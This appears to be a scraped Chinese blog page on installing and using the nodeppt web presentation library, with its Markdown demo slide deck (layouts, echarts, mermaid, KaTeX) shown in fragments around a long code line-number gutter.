    <slide :class="size-50 aligncenter">

    ## Layout

    <slide :class="size-50">

    ### **What is Stendhal Syndrome?**

    Beauty overdose. `.text-pull-right` {.text-intro}

    Imagine that you are in Florence. If you suddenly start to feel that you literally cannot breathe, you may be experiencing Stendhal Syndrome.

    Psychiatrists have long debated whether it really exists. {.text-pull-right}

    The syndrome is not only associated with viewing a beautiful place, but also good art.

    The beauty of Italian art has a concentrated perfection and transcendent sensuality that is incredibly addictive.


    <slide>

    :::{.aligncenter}

    ### Simple CSS Alignments

    Put content wherever you want.
    :::

    :::footer
    Footer: logo, credits... (.alignleft) {.alignleft}

    [:fa-twitter: @username .alignright](){.alignright}

    :::

    :::header
    Header (logo) :.alignright:{.alignright}
    :::


    <slide :class="size-80 aligncenter">

    ## Prismjs for Code Highlight

    <slide :class="size-80">

    :::column {.vertical-align}

    ### **WebSlides is really easy**

    Each parent `<section>` in the #webslides element is an individual slide. {.text-intro}

    Code is neat, scalable, and well documented. It uses **intuitive markup with popular naming conventions**. There's no need to overuse classes or nesting. **Based on** [SimpleSlides](https://github.com/jennschiffer/SimpleSlides) , by [Jenn Schiffer](http://jennmoney.biz) :)

    ----

    ```html
    <article id="webslides">
    <!-- Slide 1 -->
    <section>
    <h1>Design for trust</h1>
    </section>
    <!-- Slide 2 -->
    <section class="bg-primary">
    <div class="wrap">
    <h2>.wrap = container (width: 90%) with fadein</h2>
    </div>
    </section>
    </article>
    ```

    :::

    ---

    Vertical sliding? `<article id="webslides" class="vertical">` {.aligncenter}


    <slide :class="size-80">

    Optional · 500+ icons {.text-subtitle}

    ## [:fa-flag: Font Awesome](http://fontawesome.io/icons/) as **SVG icons** {.animated.bounceIn}

    ```markdown
    :fa-flag:
    ```


    <slide :class="size-50 aligncenter">

    ## Quote

    <slide class="bg-black-blue" :class="size-60">

    > I have always appreciated designers who dare to reinterpret fabrics and proportions, so I follow the Japanese and Belgian designers.
    > ==Zaha Hadid==
    > {.text-quote}

    <slide image="https://webslides.tv/static/images/satya.png .left-bottom">

    :::div {.content-right}

    > "There is something only a CEO uniquely can do, which is set that tone, which can then capture the soul of the collective."
    > ==Satya Nadella, CEO of Microsoft.==
    > :::


    <slide>
    :::card {.quote}



    ![](https://webslides.tv/static/images/davinci.png)

    ---

    > “WebSlides helped us build a culture of innovation and excellence.”
    > ==Leonardo da Vinci==


    <slide class="aligncenter">

    ## Plugins

    <slide :class="size-60">

    ## echarts {.aligncenter}


    ```echarts {style="height:100%;width:100%;"}
    {
    tooltip: {
    trigger: 'item',
    formatter: "{a} <br/>{b}: {c} ({d}%)"
    },
    legend: {
    orient: 'vertical',
    x: 'left',
    data:['直达','营销广告','搜索引擎','邮件营销','联盟广告','视频广告','百度','谷歌','必应','其他']
    },
    series: [
    {
    name:'访问来源',
    type:'pie',
    selectedMode: 'single',
    radius: [0, '30%'],

    label: {
    normal: {
    position: 'inner'
    }
    },
    labelLine: {
    normal: {
    show: false
    }
    },
    data:[
    {value:335, name:'直达', selected:true},
    {value:679, name:'营销广告'},
    {value:1548, name:'搜索引擎'}
    ]
    },
    {
    name:'访问来源',
    type:'pie',
    radius: ['40%', '55%'],
    label: {
    normal: {
    formatter: '{a|{a}}{abg|}\n{hr|}\n {b|{b}:}{c} {per|{d}%} ',
    backgroundColor: '#eee',
    borderColor: '#aaa',
    borderWidth: 1,
    borderRadius: 4,
    // shadowBlur:3,
    // shadowOffsetX: 2,
    // shadowOffsetY: 2,
    // shadowColor: '#999',
    // padding: [0, 7],
    rich: {
    a: {
    color: '#999',
    lineHeight: 22,
    align: 'center'
    },
    // abg: {
    // backgroundColor: '#333',
    // width: '100%',
    // align: 'right',
    // height: 22,
    // borderRadius: [4, 4, 0, 0]
    // },
    hr: {
    borderColor: '#aaa',
    width: '100%',
    borderWidth: 0.5,
    height: 0
    },
    b: {
    fontSize: 16,
    lineHeight: 33
    },
    per: {
    color: '#eee',
    backgroundColor: '#334455',
    padding: [2, 4],
    borderRadius: 2
    }
    }
    }
    },
    data:[
    {value:335, name:'直达'},
    {value:310, name:'邮件营销'},
    {value:234, name:'联盟广告'},
    {value:135, name:'视频广告'},
    {value:1048, name:'百度'},
    {value:251, name:'谷歌'},
    {value:147, name:'必应'},
    {value:102, name:'其他'}
    ]
    }
    ]
    }

    ```

    <slide class="aligncenter">

    ## Plugins: mermaid

    <slide :class="size-60">

    ## Basic sequence diagram {.aligncenter}


    <pre class="mermaid">sequenceDiagram
    Alice ->> Bob: Hello Bob, how are you?
    Bob-->>John: How about you John?
    Bob--x Alice: I am good thanks!
    Bob-x John: I am good thanks!
    Note right of John: Bob thinks a long<br/>long time, so long<br/>that the text does<br/>not fit on a row.

    Bob-->Alice: Checking with John...
    Alice->John: Yes... John, how are you?</pre>



    <slide :class="size-60">

    ## Message to self in loop {.aligncenter}

    <pre class="mermaid">sequenceDiagram
    participant Alice
    participant Bob
    Alice->>John: Hello John, how are you?
    loop Healthcheck
    John->>John: Fight against hypochondria
    end
    Note right of John: Rational thoughts<br/>prevail...
    John-->>Alice: Great!
    John->>Bob: How about you?
    Bob-->>John: Jolly good!</pre>

    <slide :class="size-80">

    ## Gantt {.aligncenter}


    <pre class="mermaid">gantt
    dateFormat YYYY-MM-DD
    title Adding GANTT diagram functionality to mermaid

    section A section
    Completed task :done, des1, 2014-01-06,2014-01-08
    Active task :active, des2, 2014-01-09, 3d
    Future task : des3, after des2, 5d
    Future task2 : des4, after des3, 5d

    section Critical tasks
    Completed task in the critical line :crit, done, 2014-01-06,24h
    Implement parser and jison :crit, done, after des1, 2d
    Create tests for parser :crit, active, 3d
    Future task in critical line :crit, 5d
    Create tests for renderer :2d
    Add to mermaid :1d

    section Documentation
    Describe gantt syntax :active, a1, after des1, 3d
    Add gantt diagram to demo page :after a1 , 20h
    Add another diagram to demo page :doc1, after a1 , 48h

    section Last section
    Describe gantt syntax :after doc1, 3d
    Add gantt diagram to demo page :20h
    Add another diagram to demo page :48h</pre>

    <slide :class="size-60">

    ## Flowchart support for fontawesome {.aligncenter}

    <pre class="mermaid">graph TD
    B["fa:fa-twitter for peace"]
    B-->C[fa:fa-ban forbidden]
    B-->D(fa:fa-spinner);
    B-->E(A fa:fa-camera-retro perhaps?);</pre>

    <slide class="aligncenter">

    ## Plugins: KaTex

    <slide class="bg-gradient-v" :class="size-60">

    ## KaTex {.aligncenter}

    | equation | description |
    | ------------------------------------------------------------ | ------------------------------------------------------------ |
    | $\nabla \cdot \vec{\mathbf{B}} = 0$ | divergence of $\vec{\mathbf{B}}$ is zero |
    | $\nabla \times \vec{\mathbf{E}}\, +\, \frac1c\, \frac{\partial\vec{\mathbf{B}}}{\partial t} = \vec{\mathbf{0}}$ | curl of $\vec{\mathbf{E}}$ is proportional to the rate of change of $\vec{\mathbf{B}}$ |
    | $\nabla \times \vec{\mathbf{B}} -\, \frac1c\, \frac{\partial\vec{\mathbf{E}}}{\partial t} = \frac{4\pi}{c}\vec{\mathbf{j}} \nabla \cdot \vec{\mathbf{E}} = 4 \pi \rho$ | _wha?_ |



    <slide :class="size-50 aligncenter">

    ## Others

    <slide :class="size-80">

    ::: {.content-left}

    ## Button

    [.button](){.button} [.button.radius](){.button.radius}

    [.button.ghost](){.button.ghost} [:fa-github: svg-icon](){.button}
    :::

    ::: {.content-left}

    ## Avatar

    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-40}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-48}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-56}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-64}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-72}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-80}

    (80, 72, 64, 56, 48, and 40).
    :::

    <slide :class="aligncenter size-50">

    ## List

    ----

    * Niubility!
    * WebSlides
    * Webpack build in
    * Markdown-it
    * Posthtml
    * Prismjs

    <slide :class="size-50">

    ## Table

    | Left-aligned | Center-aligned | Right-aligned |
    | :----------- | :------------: | ------------: |
    | git status | git status | git status |
    | git diff | git diff | git diff |
    | git status | git status | git status |


    <slide class="bg-purple" :class="size-50 aligncenter" image="http://h1.ioliu.cn/bing/SandiaSunrise_ZH-CN11155504388_1920x1080.jpg .dark">

    ## Speaker Mode

    Click **Url + [?mode=speaker](./?mode=speaker){.bg-primary style="font-size:120%"}** to show Speaker Mode.

    <slide class="bg-primary" :class="size-60 frame">

    ## View More Demos? {.text-serif.aligncenter}

    \* \* \* {.text-symbols}

    <nav class="aligncenter">
    * [:fa-th-large: Layout](./layout.html)
    * [:fa-tv: Background](./background.html)
    * [:fa-magic: Animation](./animation.html)
    * [:fa-cube: Component](./component.html)
    * [:fa-youtube: Media](./media.html)
    {.no-list-style}


    </nav>

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/PragueChristmas_EN-AU8649790921_1920x1080.jpg .dark">

    ## U work so hard, **but** 干不过 write PPTs {.animated.tada}

    快使用 [nodeppt](https://github.com/ksky521/nodeppt) 轻松搞定高大上 PPT<br/> nodeppt 助力你的人生逆袭之路!{.text-into.animated.delay-800.fadeIn}

    [:fa-cloud-download: Github](https://github.com/ksky521/nodeppt){.button.animated.delay-1s.fadeInUp}

    ​编译 index.md 生成静态 HTML 文件:

    nodeppt build test.md

    ​在本地服务器上浏览 index.md

    nodeppt serve test.md
    ]]>
    + 看一看

    耍一耍

    链接 / iframe:

    ​一个 #weblides 就是一个幻灯片对象,一个 <section/> 就是一个幻灯片页面,#section-X 表示第 X 页。

    • 快捷键:
      • Page 翻页: /// Space Home End
      • Fullscreen 全屏: F
      • Overview 大纲: -/+
      • Speaker Note 演讲者笔记: N
      • Grid Background 网格背景: Enter

    写一写

    ​新建一个文件夹,打开命令行,安装 nodeppt

    1
    npm install -g nodeppt

    ​由于这个库有点旧,在新的 nodejs 上运行会报错。需要打开对应的 package.json 修改一下内容:

    webp

    ​在 "scripts":{} 下插入 "serve": "SET NODE_OPTIONS=--openssl-legacy-provider",

    ​之后每次执行 nodeppt 的命令前都必须执行:

    1
    set NODE_OPTIONS=--openssl-legacy-provider

    ​回到文件夹,创建一个 index.md,编写如下内容:

    ​至于 nodeppt 中特有的语法,有时间再慢慢研究吧……

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    376
    377
    378
    379
    380
    381
    382
    383
    384
    385
    386
    387
    388
    389
    390
    391
    392
    393
    394
    395
    396
    397
    398
    399
    400
    401
    402
    403
    404
    405
    406
    407
    408
    409
    410
    411
    412
    413
    414
    415
    416
    417
    418
    419
    420
    421
    422
    423
    424
    425
    426
    427
    428
    429
    430
    431
    432
    433
    434
    435
    436
    437
    438
    439
    440
    441
    442
    443
    444
    445
    446
    447
    448
    449
    450
    451
    452
    453
    454
    455
    456
    457
    458
    459
    460
    461
    462
    463
    464
    465
    466
    467
    468
    469
    470
    471
    472
    473
    474
    475
    476
    477
    478
    479
    480
    481
    482
    483
    484
    485
    486
    487
    488
    489
    490
    491
    492
    493
    494
    495
    496
    497
    498
    499
    500
    501
    502
    503
    504
    505
    506
    507
    508
    509
    510
    511
    512
    513
    514
    515
    516
    517
    518
    519
    520
    521
    522
    523
    524
    525
    526
    527
    528
    529
    530
    531
    532
    533
    534
    535
    536
    537
    538
    539
    540
    541
    542
    543
    544
    545
    546
    547
    548
    549
    550
    551
    552
    553
    554
    555
    556
    557
    558
    559
    560
    561
    562
    563
    564
    565
    566
    567
    568
    569
    570
    571
    572
    573
    574
    575
    576
    577
    578
    579
    580
    581
    582
    583
    584
    585
    586
    587
    588
    589
    590
    591
    592
    593
    594
    595
    596
    597
    598
    599
    600
    601
    602
    603
    604
    605
    606
    607
    608
    609
    610
    611
    612
    613
    614
    615
    616
    617
    618
    619
    620
    621
    622
    623
    624
    625
    626
    627
    628
    629
    630
    631
    632
    633
    634
    635
    636
    637
    638
    639
    640
    641
    642
    643
    644
    645
    646
    647
    648
    649
    650
    651
    652
    653
    654
    655
    656
    657
    658
    659
    660
    661
    662
    663
    664
    665
    666
    667
    668
    669
    670
    671
    672
    673
    674
    675
    676
    677
    678
    679
    680
    681
    682
    683
    684
    685
    686
    687
    688
    689
    690
    691
    692
    693
    694
    695
    696
    697
    698
    699
    700
    701
    702
    703
    704
    705
    706
    707
    708
    709
    710
    711
    712
    713
    714
    715
    716
    717
    718
    719
    720
    721
    722
    723
    724
    725
    726
    727
    728
    729
    730
    731
    732
    733
    734
    735
    736
    737
    738
    739
    740
    741
    742
    743
    744
    745
    746
    747
    748
    749
    750
    751
    752
    753
    754
    755
    756
    757
    758
    759
    760
    761
    762
    763
    764
    765
    766
    767
    768
    769
    770
    771
    772
    773
    774
    775
    776
    777
    778
    779
    780
    781
    782
    783
    784
    785
    786
    787
    788
    789
    790
    791
    792
    793
    794
    795
    796
    797
    798
    799
    800
    801
    802
    803
    804
    805
    806
    807
    808
    809
    810
    811
    812
    813
    814
    815
    816
    817
    818
    819
    820
    821
    822
    823
    824
    825
    826
    827
    828
    829
    830
    831
    832
    833
    834
    835
    836
    837
    838
    839
    840
    841
    842
    843
    844
    845
    846
    847
    848
    849
    850
    851
    852
    853
    854
    855
    856
    857
    858
    859
    860
    861
    862
    863
    864
    865
    866
    867
    868
    869
    870
    871
    872
    873
    874
    875
    876
    877
    878
    879
    880
    881
    882
    883
    884
    885
    886
    887
    888
    889
    890
    891
    892
    893
    894
    895
    896
    897
    898
    899
    900
    901
    902
    903
    904
    905
    906
    907
    908
    909
    910
    911
    912
    913
    914
    915
    916
    917
    918
    919
    920
    921
    922
    923
    924
    925
    926
    927
    928
    929
    930
    931
    932
    933
    934
    935
    936
    937
    938
    939
    940
    941
    942
    943
    944
    945
    946
    947
    948
    949
    950
    951
    952
    953
    954
    955
    956
    957
    958
    959
    960
    961
    962
    963
    964
    965
    966
    967
    968
    969
    970
    971
    972
    973
    974
    975
    976
    977
    978
    979
    980
    981
    982
    983
    984
    985
    986
    987
    988
    989
    990
    991
    992
    993
    994
    995
    996
    997
    998
    999
    1000
    1001
    1002
    1003
    1004
    1005
    1006
    1007
    1008
    1009
    1010
    1011
    1012
    1013
    1014
    1015
    1016
    1017
    1018
    1019
    1020
    1021
    1022
    1023
    1024
    1025
    1026
    1027
    1028
    1029
    1030
    1031
    1032
    1033
    1034
    1035
    1036
    1037
    1038
    1039
    1040
    1041
    1042
    1043
    1044
    1045
    1046
    1047
    1048
    1049
    1050
    1051
    1052
    1053
    1054
    1055
    1056
    1057
    1058
    1059
    1060
    1061
    1062
    1063
    1064
    1065
    1066
    1067
    1068
    1069
    1070
    1071
    1072
    1073
    1074
    1075
    1076
    1077
    1078
    1079
    1080
    1081
    1082
    1083
    1084
    1085
    1086
    1087
    1088
    1089
    1090
    1091
    1092
    1093
    1094
    1095
    1096
    1097
    1098
    1099
    1100
    1101
    1102
    1103
    1104
    1105
    1106
    1107
    1108
    1109
    1110
    1111
    1112
    1113
    1114
    1115
    1116
    1117
    1118
    1119
    1120
    1121
    1122
    1123
    1124
    1125
    1126
    1127
    1128
    1129
    1130
    1131
    1132
    1133
    1134
    1135
    1136
    1137
    1138
    1139
    1140
    1141
    1142
    1143
    1144
    1145
    1146
    1147
    1148
    1149
    1150
    1151
    1152
    1153
    1154
    1155
    1156
    1157
    1158
    1159
    1160
    1161
    1162
    1163
    1164
    1165
    1166
    1167
    1168
    1169
    1170
    1171
    1172
    1173
    1174
    1175
    1176
    1177
    title: nodeppt - 这可能是迄今为止最好的网页版演示库
    speaker: 三水清
    url: https://github.com/ksky521/nodeppt
    js:
    - https://echarts.cdn.apache.org/zh/asset/theme/infographic.js
    plugins:
    - echarts: {theme: infographic}
    - mermaid: {theme: forest}
    - katex

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RainierDawn_EN-AU3730494945_1920x1080.jpg .dark">

    # nodeppt {.text-landing.text-shadow}

    这可能是迄今为止最好的网页版演示库 {.text-intro.animated.fadeInUp.delay-500}

    [:fa-github: Github](https://github.com/ksky521/nodeppt){.button.ghost.animated.flipInX.delay-1200}

    <slide :class="size-30 aligncenter">

    ### Install

    ---

    `npm install -g nodeppt` {.animated.fadeInUp}

    <slide :class="size-40 aligncenter">

    ### Commands

    ---

    ```shell {.animated.fadeInUp}
    # create a new slide with an official template
    $ nodeppt new slide.md

    # create a new slide straight from a github template
    $ nodeppt new slide.md -t username/repo

    # start local sever show slide
    $ nodeppt serve slide.md

    # to build a slide
    $ nodeppt build slide.md
    ```

    <slide class="bg-gradient-r" :class=" size-40 aligncenter" image="https://cn.bing.com/az/hprichbg/rb/WinterLynx_ZH-CN7158207296_1920x1080.jpg .dark">

    ## Demo Contents

    ---

    * Keyboard Shortcuts {.animated.fadeInUp}
    * CSS Syntax {.animated.fadeInUp.delay-400}
    * Background {.animated.fadeInUp.delay-800}
    * Animation {.animated.fadeInUp.delay-1200}
    * Content Position {.animated.fadeInUp.delay-1600}
    * Quotes {.animated.fadeInUp.delay-2s}
    * Plugins\: echarts/mermaid/ketax {.animated.fadeInUp.delay-2400}
    * Others\: Button/Table.. {.animated.fadeInUp.delay-2800}
    * Speaker mode.. {.animated.fadeInUp.delay-3200}

    <slide :class="size-60 aligncenter">

    ## Keyboard Shortcuts

    ---

    - Page\: ↑/↓/←/→ Space Home End
    - Fullscreen\: F
    - Overview\: -/+
    - Speaker Note\: N
    - Grid Background\: Enter

    :::note

    ## Note here

    :::
    <slide :class="size-50">

    ## :fa-heart-o: CSS Syntax

    WebSlides is so easy to understand and love. Baseline\: 8. {.text-intro}

    * :Typography\::{.text-label} .text-landing, .text-subtitle, .text-data, .text-intro...
    * :BG Colors\::{.text-label} .bg-primary, .bg-blue,.bg-apple...
    * :BG Images\::{.text-label} .background, .background-center-bottom...
    * :Sizes\::{.text-label} .size-50, .size-40...
    * :Component\::{.text-label} card, flexblock, gallery...
    * :Animation\::{.text-label} autoplay, animate.css...
    {.description}

    <slide :class="size-50 aligncenter">

    ## Text Classes

    <slide class="aligncenter">

    # Landings {.text-landing}

    `.text-landing`

    <slide class="aligncenter">

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="aligncenter">

    POWERED BY [#WEBSLIDES](https://twitter.com/search?f=tweets&vertical=default&q=%23WebSlides&src=typd) `.text-subtitle` {.text-subtitle}

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="bg-black aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RedAntarctica_EN-AU12197122155_1920x1080.jpg">

    # **Landings** {.text-landing.text-shadow}

    `.text-shadow` {.text-intro}

    <slide class="bg-apple aligncenter">

    ## 4,235,678 {.text-data}

    `.text-data`

    <slide>

    Why WebSlides? .text-context {.text-content}

    ## WebSlides is incredibly easy and versatile. The easiest way to make HTML presentations.

    <slide>

    `.text-cols (2 columns)`

    :::div {.text-cols}

    **Why WebSlides?** There are excellent presentation tools out there. WebSlides is about sharing content, essential features, and clean markup. **Each parent &lt;slide&gt;** in the #webslides element is an individual slide.

    **WebSlides help you build a culture of innovation and excellence**. When you're really passionate about your job, you can change the world. How to manage a design-driven organization? Leadership through usefulness, openness, empathy, and good taste.

    :::

    :::flexblock {.metrics}

    :fa-phone:

    Call us at 555.345.6789

    ----

    :fa-twitter:

    @username

    ----

    :fa-envelope:
    Send us an email
    :::

    <slide :class="size-50 aligncenter">

    ## Backgrounds

    <slide>

    ## Corporate Backgrounds

    :::flexblock {.blink.border}

    ## .bg-primary {..bg-primary}

    \#44d

    ---

    ## .bg-secondary {..bg-secondary}

    \#67d

    ---

    ## .bg-light {..bg-light}

    \#edf2f7

    ---

    ## body

    \#f7f9fb

    :::

    ---

    ## General Colors

    :::flexblock {.blink.border}

    ## .bg-black {..bg-black}

    \#111

    ---

    ## .bg-black-blue {..bg-black-blue}

    \#123

    ---

    ## .bg-white {..bg-white}

    \#fff
    :::

    <slide>

    ## Colorful

    :::flexblock {.border.blink}

    ## .bg-red {..bg-red}

    \#c23

    ---

    ## .bg-green {..bg-green}

    \#077

    ---

    ## .bg-blue {..bg-blue}

    \#346

    ---

    ## .bg-purple {..bg-purple}

    \#62b

    :::

    ---

    ### Transparent Backgrounds

    :::flexblock {.border.blink}

    ## .bg-trans-dark {..bg-trans-dark}

    rgba(0, 0, 0, 0.5)

    ---

    ## .bg-trans-light {..bg-trans-light}

    rgba(255, 255, 255, 0.2)

    :::

    <slide class="bg-gradient-h">

    # Gradients

    :::flexblock {.border}

    Horizontal
    `.bg-gradient-h`

    ---

    Radial
    `.bg-gradient-r`

    ---

    Vertical
    `.bg-gradient-v`
    :::

    <slide class="bg-gradient-v aligncenter">

    ## Vertical Gradient

    `.bg-gradient-v`

    <slide class="bg-gradient-r aligncenter">

    ## Radial Gradient

    `.bg-gradient-r`

    <slide class="bg-black" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg'" >

    `.background-video`

    ## **WebSlides is the easiest way to make HTML presentations. Inspire and engage.**

    <slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">

    ## BG Video with Overlay {.text-landing}

    `<slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">` or `.light`

    <slide class="fullscreen bg-blue" youtube=".dark id='_m67JbGjWnc' autoplay loop" :class="aligncenter">

    ## **Youtube Background**

    `<slide youtube=".dark id='_m67JbGjWnc' autoplay loop">`

    <slide image="https://webslides.tv/static/images/iphone-hand.png .right-bottom">

    :::{.content-left}

    ### .background-(position)

    :::flexblock {.specs}
    ::fa-wifi::

    ## Ultra-Fast WiFi

    Simple and secure file sharing.

    ---

    ::fa-battery-full::

    ## All day battery life

    Your battery worries may be over.

    ---

    ::fa-life-ring::

    ## All day battery life

    We'll fix it or if we can't, we'll replace it.

    :::

    <slide :class="size-50 aligncenter">

    ## Components

    <slide :class="size-60">

    ## Shadowbox

    `:::shadowbox`

    ---

    :::shadowbox

    ## We're web people.

    There're excellent presentation tools out there. WebSlides is about telling the story, and sharing it in a beautiful way. Hypertext and clean code as narrative elements.

    ---

    ## Work better, faster.

    Designers, marketers, and journalists can now focus on the content. Simply [choose a demo](https://webslides.tv/demos) and customize it in minutes.

    :::

    <slide :class="size-80">

    :::card

    ## Card

    .card-50.bg-white

    [Unsplash](http://Unsplash.com) is a really cool resource. It is a collection of Creative Commons Zero licensed photos that are really great. {.text-intro}

    - :Role\::{.text-label} Frontend
    - :client\::{.text-label} Acme
    - :year\::{.text-label} 2018
    {.description}

    ---

    ![](https://source.unsplash.com/rCOWMC8qf8A/)

    :::

    <slide class="fullscreen">

    :::card

    ![](https://source.unsplash.com/ALtNa-uKy3M/)

    ---

    ## Bonsai

    Bonsai is a Japanese art form using trees grown in containers — **.fullscreen > .card-50.** {.text-intro}

    Similar practices exist in other cultures, including the Chinese tradition of penjing from which the art originated, and the miniature living landscapes of Vietnamese hòn non bộ.

    :::

    <slide class="aligncenter">

    ## **Flexible blocks**

    `:::flexblock` = Flexible blocks with auto-fill and equal height.

    <slide>

    ## Flexblock

    :::flexblock

    ## :fa-bar-chart: Purpose

    Businesses that people love5

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love6

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love7

    ---

    ## :fa-cog: Purpose

    Businesses that people love8

    :::

    ---

    ## Flexblock `{.blink.border}`

    :::flexblock {.blink.border}

    ## :fa-bar-chart: Purpose

    Businesses that people love1

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love2

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love3

    ---

    ## :fa-cog: Purpose

    Businesses that people love4

    :::

    <slide>

    ## Flexblock clients

    `{.clients}`

    :::flexblock {.clients}

    ![](https://webslides.tv/static/images/logos/google.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/microsoft.svg) {.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/instagram.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/netflix.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    :::

    <slide :class="size-70">

    ### Gallery

    `:::gallery`

    :::gallery

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/6anudmpILw4/800x600)

    ## Sam Trololovitz

    Master of nothing

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide :class="size-80">

    ### Gallery overlay

    `:::gallery-overlay`

    :::gallery-overlay

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/zhkTCCmD4xI/800x600)

    ## Sam Trololovitz

    CTO

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide class="bg-red frame">

    :::cta

    ::^\$^40::

    ---

    ## Watch TV shows anytime, anywhere

    .frame.bg-red

    :::


    <slide class="bg-black-blue">

    ## Grid Columns

    :::column

    ### **:fa-line-chart: Design**

    Design for growth. We've built a team of world-class designers, developers, and managers.

    ---

    ### **:fa-film: Videos**

    We connect your audience needs, business goals, and brand values into a strategy.

    ---

    ### **:fa-users: Users**

    We offer personalized services with deep expertise in design and technology.

    ---

    ### **:fa-graduation-cap: Teams**

    We train teams to help organizations succeed in the digital age.
    :::

    <slide :class="size-50 aligncenter">

    ## Animations

    <slide :class="aligncenter">

    ## Autoplay Animation

    `.animated.lightSpeedIn.slow` {.lightSpeedIn.animated.slow}

    <slide :class="size-50">

    ### **animate.css** + `.build`

    ---

    1. **fadeIn**{.bounce}
    2. **swing**{.swing}
    3. **flash**{.flash}
    4. **pulse**{.pulse}
    5. **shake**{.shake}
    6. **bounceIn**{.bounceIn}
    7. **wobble**{.wobble}
    8. **fadeInLeft**{.fadeInLeft}
    9. **flipInX**{.flipInX}
    10. **tada**{.tada}
    11. **slideInUp**{.slideInUp}
    12. **jello**{.jello}
    13. **heartBeat**{.heartBeat}
    14. **fadeInUp**{.fadeInUp}
    15. **lightSpeedIn**{.lightSpeedIn}
    {.text-cols.build}

    <slide class="bg-black aligncenter" image="https://source.unsplash.com/n9WPPWiPPJw/ .anim">

    ## .background.anim

    <slide :class="size-50 aligncenter">

    ## Content Position

    <slide class="slide-top">
    :::{.content-left}

    ### 1/9 left top

    Put content wherever you want. Have less. Do more. Create beautiful solutions.

    `.slide-top and .content-left`


    <slide class="slide-top">
    :::{.content-center}

    ### 2/9 center top

    In a village of La Mancha, the name of which I have no desire to call to mind,

    `.slide-top and .content-center`

    <slide class="slide-top">
    :::{.content-right}

    ### 3/9 right top

    there lived not long since one of those gentlemen that keep a lance in the lance-rack, an old buckler, a lean hack, and a greyhound for coursing.

    `.slide-top and .content-right`


    <slide>
    :::{.content-left}

    ### 4/9 left top

    An olla of rather more beef than mutton, a salad on most nights, scraps on Saturdays,

    `.content-left`

    <slide>
    :::{.content-center}

    ### 5/9 center top

    lentils on Fridays, and a pigeon or so extra on Sundays, made away with three-quarters of his income.

    `.content-center`

    <slide>
